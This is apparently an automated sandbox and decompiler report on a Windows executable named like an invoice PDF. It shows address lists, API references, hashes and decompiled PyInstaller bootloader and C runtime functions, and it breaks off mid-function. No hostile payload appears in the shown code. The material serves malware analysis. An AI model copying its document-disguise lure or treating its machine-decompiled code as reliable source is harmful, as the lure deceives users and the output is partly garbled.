                            0x01312fba
                            0x01312fbf
                            0x01312fbf
                            0x01312f7f
                            0x01312f7f
                            0x01312f84
                            0x01312f91
                            0x01312f91
                            0x01312f96
                            0x01312f96
                            0x01312f56
                            0x01312f56
                            0x01312f5b
                            0x01312f68
                            0x01312f68
                            0x01312f6d
                            0x01312f6d
                            0x01312f2d
                            0x01312f2d
                            0x01312f32
                            0x01312f3f
                            0x01312f3f
                            0x01312f44
                            0x01312f44
                            0x01312f04
                            0x01312f04
                            0x01312f09
                            0x01312f16
                            0x01312f16
                            0x01312f1b
                            0x01312f1b
                            0x01312edb
                            0x01312edb
                            0x01312ee0
                            0x01312eed
                            0x01312eed
                            0x01312ef2
                            0x01312ef2
                            0x01312eb2
                            0x01312eb2
                            0x01312eb7
                            0x01312ec4
                            0x01312ec4
                            0x01312ec9
                            0x01312ec9
                            0x01312e89
                            0x01312e89
                            0x01312e8e
                            0x01312e9b
                            0x01312e9b
                            0x01312ea0
                            0x01312ea0
                            0x01312e60
                            0x01312e60
                            0x01312e65
                            0x01312e72
                            0x01312e72
                            0x01312e77
                            0x01312e77
                            0x01312e37
                            0x01312e37
                            0x01312e3c
                            0x01312e49
                            0x01312e49
                            0x01312e4e
                            0x01312e4e
                            0x01312e0e
                            0x01312e0e
                            0x01312e13
                            0x01312e20
                            0x01312e20
                            0x01312e25
                            0x01312e25
                            0x01312de5
                            0x01312de5
                            0x01312dea
                            0x01312df7
                            0x01312df7
                            0x01312dfc
                            0x01312dfc
                            0x01312dbc
                            0x01312dbc
                            0x01312dc1
                            0x01312dce
                            0x01312dce
                            0x01312dd3
                            0x01312dd3
                            0x01312d93
                            0x01312d93
                            0x01312d98
                            0x01312da5
                            0x01312da5
                            0x01312daa
                            0x01312daa
                            0x01312d6a
                            0x01312d6a
                            0x01312d6f
                            0x01312d7c
                            0x01312d7c
                            0x01312d81
                            0x01312d81
                            0x01312d41
                            0x01312d41
                            0x01312d46
                            0x01312d53
                            0x01312d53
                            0x01312d58
                            0x01312d58
                            0x01312d18
                            0x01312d18
                            0x01312d1d
                            0x01312d2a
                            0x01312d2a
                            0x01312d2f
                            0x01312d2f
                            0x01312cef
                            0x01312cef
                            0x01312cf4
                            0x01312d01
                            0x01312d01
                            0x01312d06
                            0x01312d06
                            0x01312cc6
                            0x01312cc6
                            0x01312ccb
                            0x01312cd8
                            0x01312cd8
                            0x01312cdd
                            0x01312cdd
                            0x01312c9d
                            0x01312c9d
                            0x01312ca2
                            0x01312caf
                            0x01312caf
                            0x01312cb4
                            0x01312cb4
                            0x01312c74
                            0x01312c74
                            0x01312c79
                            0x01312c86
                            0x01312c86
                            0x01312c8b
                            0x01312c8b
                            0x01312c4b
                            0x01312c4b
                            0x01312c50
                            0x01312c5d
                            0x01312c5d
                            0x01312c62
                            0x01312c62
                            0x01312c22
                            0x01312c22
                            0x01312c27
                            0x01312c34
                            0x01312c34
                            0x01312c39
                            0x01312c39
                            0x01312bf9
                            0x01312bf9
                            0x01312bfe
                            0x01312c0b
                            0x01312c0b
                            0x01312c10
                            0x01312c10
                            0x01312bd0
                            0x01312bd0
                            0x01312bd5
                            0x01312be2
                            0x01312be2
                            0x01312be7
                            0x01312be7
                            0x01312ba7
                            0x01312ba7
                            0x01312bac
                            0x01312bb9
                            0x01312bb9
                            0x01312bbe
                            0x01312bbe
                            0x01312b7e
                            0x01312b7e
                            0x01312b83
                            0x01312b90
                            0x01312b90
                            0x01312b95
                            0x01312b95
                            0x01312b55
                            0x01312b55
                            0x01312b5a
                            0x01312b67
                            0x01312b67
                            0x01312b6c
                            0x01312b6c
                            0x01312b2c
                            0x01312b2c
                            0x01312b31
                            0x01312b3e
                            0x01312b3e
                            0x01312b43
                            0x01312b43
                            0x01312b03
                            0x01312b03
                            0x01312b08
                            0x01312b15
                            0x01312b15
                            0x01312b1a
                            0x01312b1a
                            0x01312ada
                            0x01312ada
                            0x01312adf
                            0x01312aec
                            0x01312aec
                            0x01312af1
                            0x01312af1
                            0x01312ab1
                            0x01312ab1
                            0x01312ab6
                            0x01312ac3
                            0x01312ac3
                            0x01312ac8
                            0x01312ac8
                            0x01312a88
                            0x01312a88
                            0x01312a8d
                            0x01312a9a
                            0x01312a9a
                            0x01312a9f
                            0x01312a9f
                            0x01312a5f
                            0x01312a5f
                            0x01312a64
                            0x01312a71
                            0x01312a71
                            0x01312a76
                            0x01312a76
                            0x01312a36
                            0x01312a36
                            0x01312a3b
                            0x01312a48
                            0x01312a48
                            0x01312a4d
                            0x01312a4d
                            0x01312a0d
                            0x01312a0d
                            0x01312a12
                            0x01312a24
                            0x01312a24

                            APIs
                            • GetProcAddress.KERNEL32(01313587,Py_DontWriteBytecodeFlag), ref: 01312A02
                            • GetProcAddress.KERNEL32(01313587,Py_FileSystemDefaultEncoding), ref: 01312A2B
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AddressProc$ErrorLast
                            • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleString$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for 
Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleString$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_VerboseFlag
                            • API String ID: 4214558900-925859108
                            • Opcode ID: 38c9960c825e057e3b55d35cf242dac6b495d8c461bc580ff28b3022ecb1116e
                            • Instruction ID: d343b09d3d70e09933d2eed9ef48c94462d06f4c8becccbebfae63663afa05a8
                            • Opcode Fuzzy Hash: 38c9960c825e057e3b55d35cf242dac6b495d8c461bc580ff28b3022ecb1116e
                            • Instruction Fuzzy Hash: FF02F862B85B0A61D51D3A3F7C068CE6A984EE167EB11533BF520E03EDFBD0C04659AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 22%
                            			E01314740(void* __edx, char* _a4) {
                            				short* _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				int _t18;
                            				short* _t23;
                            				void* _t24;
                            				void* _t25;
                            				char* _t26;
                            				struct HINSTANCE__* _t27;
                            				int _t28;
                            				intOrPtr* _t30;
                            				intOrPtr* _t32;
                            
                            				_t25 = __edx;
                            				_t33 =  &_v32;
                            				_t26 = _a4;
                            				_t28 = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, 0, 0);
                            				_t36 = _t28;
                            				if(_t28 != 0) {
                            					_t2 = _t28 + 1; // 0x1
                            					_push(2);
                            					_t23 = E013197F8(_t24);
                            					_t33 =  &_v32 + 8;
                            					__eflags = _t23;
                            					if(__eflags != 0) {
                            						__eflags = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, _t23, _t28);
                            						if(__eflags == 0) {
                            							_push("Failed to decode wchar_t from UTF-8\n");
                            							goto L6;
                            						}
                            					} else {
                            						_push("Out of memory.");
                            						_push("win32_utils_from_utf8");
                            						goto L7;
                            					}
                            				} else {
                            					_push("Failed to get wchar_t buffer size.\n");
                            					L6:
                            					_push("MultiByteToWideChar");
                            					L7:
                            					E01311860(_t25, _t36);
                            					_t33 = _t33 + 8;
                            					_t23 = 0;
                            				}
                            				_t27 = LoadLibraryA("kernel32");
                            				_t32 = GetProcAddress(_t27, "CreateActCtxW");
                            				_t30 = GetProcAddress(_t27, "ActivateActCtx");
                            				if(_t32 == 0 || _t30 == 0) {
                            					L14:
                            					__eflags = 0;
                            					return 0;
                            				} else {
                            					asm("xorps xmm0, xmm0");
                            					asm("movups [esp+0x10], xmm0");
                            					asm("movups [esp+0x24], xmm0");
                            					_v32 = 0x20;
                            					_v24 = _t23;
                            					_v28 = 0x10;
                            					 *0x133c000 =  *_t32( &_v32);
                            					L01319803(_t23);
                            					_t18 =  *0x133c000; // 0xffffffff
                            					if(_t18 == 0xffffffff) {
                            						L13:
                            						_push(0);
                            						 *0x133c000 = 0xffffffff;
                            						E01314860(_t25);
                            						goto L14;
                            					} else {
                            						_push(0x1344a50);
                            						_push(_t18);
                            						if( *_t30() == 0) {
                            							goto L13;
                            						} else {
                            							return 1;
                            						}
                            					}
                            				}
                            			}
















                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0131475F
                            • LoadLibraryA.KERNEL32(kernel32,?,?,?,?,?,?,?,?,013121A8,?,?,?,?,01312639,00000000), ref: 013147B9
                            • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 013147CD
                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 013147D7
                              • Part of subcall function 01314860: GetLastError.KERNEL32(013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 01314883
                              • Part of subcall function 01314860: FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 013148A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharErrorFormatLastLibraryLoadMessageMultiWide
                            • String ID: $ActivateActCtx$CreateActCtxW$Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$kernel32$win32_utils_from_utf8
                            • API String ID: 476984482-989751517
                            • Opcode ID: 88287ffa5c28931529da11a9ac41da7c988c781493380808a8f24b1c1ac56eb0
                            • Instruction ID: 0ff0e8c5fa000a24a614515a6a43087516136ef65ca9b01f86f8a5f0fab17f5f
                            • Opcode Fuzzy Hash: 88287ffa5c28931529da11a9ac41da7c988c781493380808a8f24b1c1ac56eb0
                            • Instruction Fuzzy Hash: 6F215C71A4431967E3346AAF6C41F57BA9C9B81B3CF14063AFD20A62C4E7A1D44483EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E01314860(void* __edx, signed int _a8192, long _a8200) {
                            				short _v0;
                            				signed int _t8;
                            				long _t10;
                            				long _t11;
                            				void* _t24;
                            				signed int _t26;
                            
                            				_t24 = __edx;
                            				E01317880();
                            				_t8 =  *0x133c008; // 0xa3433343
                            				_a8192 = _t8 ^ _t26;
                            				_t10 = _a8200;
                            				if(_t10 == 0) {
                            					_t10 = GetLastError();
                            				}
                            				_t11 = FormatMessageW(0x1000, 0, _t10, 0x400,  &_v0, 0x1000, 0);
                            				_t32 = _t11;
                            				if(_t11 != 0) {
                            					__eflags = E01314C90(0x1344a58,  &_v0, 0x1000);
                            					_t19 =  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            					_t14 =  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            					__eflags = _a8192 ^ _t26 + 0x0000000c;
                            					E0131786A();
                            					return  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            				} else {
                            					_push("No error messages generated.\n");
                            					_push("FormatMessageW");
                            					E01311860(_t24, _t32);
                            					E0131786A();
                            					return "PyInstaller: FormatMessageW failed.";
                            				}
                            			}










                            APIs
                            • GetLastError.KERNEL32(013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 01314883
                              • Part of subcall function 01314C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,01344A58,?,00001000,?,?), ref: 01314CAA
                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 013148A2
                            Strings
                            • PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 013148EF
                            • No error messages generated., xrefs: 013148AC
                            • FormatMessageW, xrefs: 013148B1
                            • PyInstaller: FormatMessageW failed., xrefs: 013148BE
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharErrorFormatLastMessageMultiWide
                            • String ID: FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
                            • API String ID: 1653872744-3268588819
                            • Opcode ID: c22856d40d3d283ae64f8b2507bcc98d23c11c7f82f275e0a25b67d6a0d4c6e3
                            • Instruction ID: 731526bd93bf7908a7a6fbf15fd914cfeb9636359533e92ef0d41f7023bf71ce
                            • Opcode Fuzzy Hash: c22856d40d3d283ae64f8b2507bcc98d23c11c7f82f275e0a25b67d6a0d4c6e3
                            • Instruction Fuzzy Hash: 3801F7717403416BF72C97199C8BBAA77D5EF98B4DF44442CBA4DC9285F6609804C35F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E0132974E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                            				signed int _v0;
                            				signed int _v8;
                            				void* _v12;
                            				signed short _v16;
                            				char _v20;
                            				intOrPtr _v28;
                            				char _v32;
                            				char _v460;
                            				signed short _v464;
                            				void _v468;
                            				signed int _v472;
                            				signed int _v932;
                            				signed int _v936;
                            				signed int _v1392;
                            				signed int _v1396;
                            				signed int _v1400;
                            				char _v1860;
                            				signed int _v1864;
                            				signed short _v1865;
                            				signed int _v1872;
                            				signed int _v1876;
                            				signed int _v1880;
                            				signed int _v1884;
                            				signed int _v1888;
                            				signed short _v1892;
                            				signed short _v1896;
                            				intOrPtr _v1900;
                            				signed short _v1904;
                            				signed short _v1908;
                            				signed int _v1912;
                            				signed short _v1916;
                            				signed int _v1920;
                            				signed int _v1924;
                            				signed int _v1928;
                            				char _v1936;
                            				char _v1944;
                            				char _v2404;
                            				signed int _v2408;
                            				intOrPtr _v2436;
                            				signed int _t745;
                            				signed short _t755;
                            				signed short _t756;
                            				signed short _t757;
                            				signed int _t760;
                            				signed short _t763;
                            				signed short _t764;
                            				signed short _t765;
                            				signed short _t766;
                            				signed short _t769;
                            				signed short _t770;
                            				signed short _t772;
                            				signed short _t774;
                            				signed short _t775;
                            				signed short _t781;
                            				signed short _t787;
                            				intOrPtr _t789;
                            				void* _t790;
                            				signed int _t791;
                            				signed int _t792;
                            				signed short _t793;
                            				signed int _t802;
                            				signed int _t807;
                            				signed int _t808;
                            				signed short _t809;
                            				signed short _t812;
                            				signed short _t813;
                            				signed short _t814;
                            				signed int _t816;
                            				signed int _t817;
                            				signed int _t822;
                            				signed int _t823;
                            				signed short _t829;
                            				signed int _t830;
                            				signed int _t833;
                            				signed int _t838;
                            				signed int _t846;
                            				signed int* _t849;
                            				signed int _t853;
                            				signed int _t864;
                            				signed int _t865;
                            				signed short _t867;
                            				char* _t868;
                            				signed short _t871;
                            				signed int _t875;
                            				signed int _t876;
                            				signed short _t881;
                            				signed int _t883;
                            				signed short _t888;
                            				signed int _t897;
                            				signed int _t900;
                            				signed int _t902;
                            				signed short _t905;
                            				signed short _t906;
                            				signed int _t907;
                            				signed int _t910;
                            				signed int _t923;
                            				signed int _t924;
                            				signed short _t926;
                            				char* _t927;
                            				signed short _t930;
                            				signed int _t934;
                            				signed int _t935;
                            				signed int* _t937;
                            				signed short _t940;
                            				signed int _t942;
                            				signed short _t947;
                            				signed int _t955;
                            				signed int _t958;
                            				signed int _t962;
                            				signed int* _t969;
                            				intOrPtr _t971;
                            				void* _t972;
                            				intOrPtr* _t974;
                            				signed int* _t978;
                            				unsigned int _t989;
                            				signed int _t990;
                            				void* _t993;
                            				signed int _t994;
                            				void* _t996;
                            				signed int _t997;
                            				signed int _t998;
                            				signed short _t999;
                            				signed short _t1009;
                            				signed int _t1014;
                            				signed int _t1017;
                            				unsigned int _t1020;
                            				signed int _t1021;
                            				void* _t1024;
                            				signed int _t1025;
                            				void* _t1027;
                            				signed int _t1028;
                            				signed int _t1029;
                            				signed short _t1030;
                            				signed int _t1035;
                            				signed int* _t1040;
                            				signed int _t1042;
                            				signed int _t1052;
                            				void _t1055;
                            				signed int _t1058;
                            				void* _t1061;
                            				intOrPtr _t1071;
                            				signed short _t1075;
                            				signed short _t1076;
                            				signed int _t1081;
                            				signed int _t1082;
                            				signed int _t1085;
                            				signed int _t1086;
                            				signed int _t1088;
                            				signed int _t1089;
                            				signed short _t1090;
                            				signed int _t1094;
                            				signed int _t1098;
                            				signed int _t1099;
                            				signed short _t1100;
                            				signed int _t1102;
                            				signed int _t1103;
                            				signed short _t1104;
                            				signed int _t1105;
                            				signed int _t1106;
                            				signed int _t1107;
                            				signed int _t1109;
                            				signed int _t1110;
                            				signed short _t1111;
                            				signed int _t1112;
                            				signed int _t1113;
                            				signed int _t1114;
                            				unsigned int _t1115;
                            				void* _t1118;
                            				intOrPtr _t1120;
                            				signed int _t1121;
                            				signed int _t1122;
                            				signed short _t1123;
                            				signed int* _t1127;
                            				void* _t1131;
                            				void* _t1132;
                            				signed short _t1133;
                            				signed int _t1134;
                            				signed int _t1135;
                            				signed short _t1138;
                            				signed short _t1139;
                            				signed int _t1144;
                            				void* _t1146;
                            				signed short _t1148;
                            				signed int _t1151;
                            				char _t1156;
                            				signed int _t1158;
                            				signed short _t1159;
                            				signed short _t1160;
                            				signed short _t1161;
                            				signed int _t1162;
                            				signed short _t1163;
                            				signed int _t1164;
                            				signed short _t1168;
                            				signed int _t1169;
                            				signed int _t1170;
                            				signed short _t1171;
                            				signed int _t1172;
                            				unsigned int _t1175;
                            				void* _t1179;
                            				void* _t1180;
                            				unsigned int _t1181;
                            				signed short _t1186;
                            				signed int _t1187;
                            				signed short _t1189;
                            				signed int _t1190;
                            				intOrPtr* _t1192;
                            				signed int _t1193;
                            				signed int _t1195;
                            				signed short _t1196;
                            				signed int _t1199;
                            				signed int _t1201;
                            				signed short _t1202;
                            				void* _t1203;
                            				signed short _t1204;
                            				signed int _t1205;
                            				signed short _t1206;
                            				void* _t1209;
                            				signed short _t1210;
                            				signed short _t1211;
                            				signed int _t1212;
                            				signed int _t1213;
                            				signed int _t1214;
                            				signed int* _t1217;
                            				signed short _t1218;
                            				signed short _t1219;
                            				signed int _t1220;
                            				signed int _t1221;
                            				intOrPtr* _t1223;
                            				intOrPtr* _t1224;
                            				signed int _t1226;
                            				signed int _t1228;
                            				signed int _t1231;
                            				signed int _t1237;
                            				signed int _t1241;
                            				signed short _t1246;
                            				signed int _t1249;
                            				signed short _t1250;
                            				signed int _t1251;
                            				signed short _t1252;
                            				signed short _t1253;
                            				signed int _t1254;
                            				signed int _t1256;
                            				signed int _t1257;
                            				signed int _t1258;
                            				signed short _t1259;
                            				signed int _t1261;
                            				signed int _t1262;
                            				signed int _t1263;
                            				signed int _t1264;
                            				signed int _t1265;
                            				signed int _t1267;
                            				signed int _t1268;
                            				signed int _t1270;
                            				signed int _t1272;
                            				signed int _t1274;
                            				signed int _t1276;
                            				signed int* _t1278;
                            				signed int* _t1282;
                            				signed int _t1291;
                            
                            				_t1146 = __edx;
                            				_t745 =  *0x133c008; // 0xa3433343
                            				_v8 = _t745 ^ _t1276;
                            				_push(__ebx);
                            				_t1052 = _a20;
                            				_t1192 = _a16;
                            				_v1924 = _t1192;
                            				_v1920 = _t1052;
                            				E01329275( &_v1944, __eflags);
                            				_t1241 = _a8;
                            				_t750 = 0x2d;
                            				if((_t1241 & 0x80000000) == 0) {
                            					_t750 = 0x120;
                            				}
                            				 *_t1192 = _t750;
                            				 *((intOrPtr*)(_t1192 + 8)) = _t1052;
                            				_t1193 = _a4;
                            				if((_t1241 & 0x7ff00000) != 0) {
                            					L5:
                            					_t755 = E013245CE( &_a4);
                            					_pop(_t1067);
                            					__eflags = _t755;
                            					if(_t755 != 0) {
                            						_t1067 = _v1924;
                            						 *((intOrPtr*)(_v1924 + 4)) = 1;
                            					}
                            					_t756 = _t755 - 1;
                            					__eflags = _t756;
                            					if(_t756 == 0) {
                            						_push("1#INF");
                            						goto L308;
                            					} else {
                            						_t774 = _t756 - 1;
                            						__eflags = _t774;
                            						if(_t774 == 0) {
                            							_push("1#QNAN");
                            							goto L308;
                            						} else {
                            							_t775 = _t774 - 1;
                            							__eflags = _t775;
                            							if(_t775 == 0) {
                            								_push("1#SNAN");
                            								goto L308;
                            							} else {
                            								__eflags = _t775 == 1;
                            								if(_t775 == 1) {
                            									_push("1#IND");
                            									goto L308;
                            								} else {
                            									_v1928 = _v1928 & 0x00000000;
                            									_a4 = _t1193;
                            									_a8 = _t1241 & 0x7fffffff;
                            									_t1291 = _a4;
                            									asm("fst qword [ebp-0x768]");
                            									_t1195 = _v1896;
                            									_v1916 = _a12 + 1;
                            									_t1081 = _t1195 >> 0x14;
                            									_t781 = _t1081 & 0x000007ff;
                            									__eflags = _t781;
                            									if(_t781 != 0) {
                            										_t1148 = 0;
                            										_t781 = 0;
                            										__eflags = 0;
                            									} else {
                            										_t1148 = 1;
                            									}
                            									_t1196 = _t1195 & 0x000fffff;
                            									_t1055 = _v1900 + _t781;
                            									asm("adc edi, esi");
                            									__eflags = _t1148;
                            									_t1082 = _t1081 & 0x000007ff;
                            									_t1246 = _t1082 - 0x434 + (0 | _t1148 != 0x00000000) + 1;
                            									_v1872 = _t1246;
                            									E0132CB80(_t1082, _t1291);
                            									_push(_t1082);
                            									_push(_t1082);
                            									 *_t1278 = _t1291;
                            									_t787 = E0132F2A0(E0132CC90(), _t1291);
                            									_v1904 = _t787;
                            									__eflags = _t787 - 0x7fffffff;
                            									if(_t787 == 0x7fffffff) {
                            										L16:
                            										__eflags = 0;
                            										_v1904 = 0;
                            									} else {
                            										__eflags = _t787 - 0x80000000;
                            										if(_t787 == 0x80000000) {
                            											goto L16;
                            										}
                            									}
                            									_v468 = _t1055;
                            									__eflags = _t1196;
                            									_v464 = _t1196;
                            									_t1058 = (0 | _t1196 != 0x00000000) + 1;
                            									_v472 = _t1058;
                            									__eflags = _t1246;
                            									if(_t1246 < 0) {
                            										__eflags = _t1246 - 0xfffffc02;
                            										if(_t1246 == 0xfffffc02) {
                            											L101:
                            											_t789 =  *((intOrPtr*)(_t1276 + _t1058 * 4 - 0x1d4));
                            											_t195 =  &_v1896;
                            											 *_t195 = _v1896 & 0x00000000;
                            											__eflags =  *_t195;
                            											asm("bsr eax, eax");
                            											if( *_t195 == 0) {
                            												_t1085 = 0;
                            												__eflags = 0;
                            											} else {
                            												_t1085 = _t789 + 1;
                            											}
                            											_t790 = 0x20;
                            											_t791 = _t790 - _t1085;
                            											__eflags = _t791 - 1;
                            											_t792 = _t791 & 0xffffff00 | _t791 - 0x00000001 > 0x00000000;
                            											__eflags = _t1058 - 0x73;
                            											_v1865 = _t792;
                            											_t1086 = _t1085 & 0xffffff00 | _t1058 - 0x00000073 > 0x00000000;
                            											__eflags = _t1058 - 0x73;
                            											if(_t1058 != 0x73) {
                            												L107:
                            												_t793 = 0;
                            												__eflags = 0;
                            											} else {
                            												__eflags = _t792;
                            												if(_t792 == 0) {
                            													goto L107;
                            												} else {
                            													_t793 = 1;
                            												}
                            											}
                            											__eflags = _t1086;
                            											if(_t1086 != 0) {
                            												L126:
                            												_v1400 = _v1400 & 0x00000000;
                            												_t224 =  &_v472;
                            												 *_t224 = _v472 & 0x00000000;
                            												__eflags =  *_t224;
                            												E01319BDB( &_v468, 0x1cc,  &_v1396, 0);
                            												_t1278 =  &(_t1278[4]);
                            											} else {
                            												__eflags = _t793;
                            												if(_t793 != 0) {
                            													goto L126;
                            												} else {
                            													_t1113 = 0x72;
                            													__eflags = _t1058 - _t1113;
                            													if(_t1058 < _t1113) {
                            														_t1113 = _t1058;
                            													}
                            													__eflags = _t1113 - 0xffffffff;
                            													if(_t1113 != 0xffffffff) {
                            														_t1264 = _t1113;
                            														_t1223 =  &_v468 + _t1113 * 4;
                            														_v1880 = _t1223;
                            														while(1) {
                            															__eflags = _t1264 - _t1058;
                            															if(_t1264 >= _t1058) {
                            																_t208 =  &_v1876;
                            																 *_t208 = _v1876 & 0x00000000;
                            																__eflags =  *_t208;
                            															} else {
                            																_v1876 =  *_t1223;
                            															}
                            															_t210 = _t1264 - 1; // 0x70
                            															__eflags = _t210 - _t1058;
                            															if(_t210 >= _t1058) {
                            																_t1175 = 0;
                            																__eflags = 0;
                            															} else {
                            																_t1175 =  *(_t1223 - 4);
                            															}
                            															_t1223 = _t1223 - 4;
                            															_t969 = _v1880;
                            															_t1264 = _t1264 - 1;
                            															 *_t969 = _t1175 >> 0x0000001f ^ _v1876 + _v1876;
                            															_v1880 = _t969 - 4;
                            															__eflags = _t1264 - 0xffffffff;
                            															if(_t1264 == 0xffffffff) {
                            																break;
                            															}
                            															_t1058 = _v472;
                            														}
                            														_t1246 = _v1872;
                            													}
                            													__eflags = _v1865;
                            													if(_v1865 == 0) {
                            														_v472 = _t1113;
                            													} else {
                            														_t218 = _t1113 + 1; // 0x73
                            														_v472 = _t218;
                            													}
                            												}
                            											}
                            											_t1199 = 1 - _t1246;
                            											E01318520(_t1199,  &_v1396, 0, 1);
                            											__eflags = 1;
                            											 *(_t1276 + 0xbad63d) = 1 << (_t1199 & 0x0000001f);
                            											_t802 = 0xbadbae;
                            										} else {
                            											_v1396 = _v1396 & 0x00000000;
                            											_t1114 = 2;
                            											_v1392 = 0x100000;
                            											_v1400 = _t1114;
                            											__eflags = _t1058 - _t1114;
                            											if(_t1058 == _t1114) {
                            												_t1179 = 0;
                            												__eflags = 0;
                            												while(1) {
